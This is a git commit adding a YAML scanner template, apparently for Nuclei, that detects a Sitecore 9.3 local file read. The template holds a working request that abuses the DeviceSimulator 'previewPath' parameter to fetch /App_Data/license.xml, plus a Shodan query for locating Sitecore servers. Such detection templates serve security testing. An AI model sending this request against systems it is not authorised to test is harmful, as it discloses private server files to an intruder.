Create sitecore-lfi.yaml

patch-1
Dhiyaneshwaran 2023-05-15 02:36:17 +05:30 committed by GitHub
parent 8b2030bbb2
commit eb322cc354
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: sitecore-lfi
info:
name: Sitecore 9.3 - Webroot File Read
author: DhiyaneshDK
severity: high
reference:
- https://blog.assetnote.io/2023/05/10/sitecore-round-two/
metadata:
max-request: 1
verified: "true"
shodan-query: title:"Sitecore"
tags: sitecore,lfi
http:
- method: GET
path:
- "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "signedlicense id"
- type: status
status:
- 200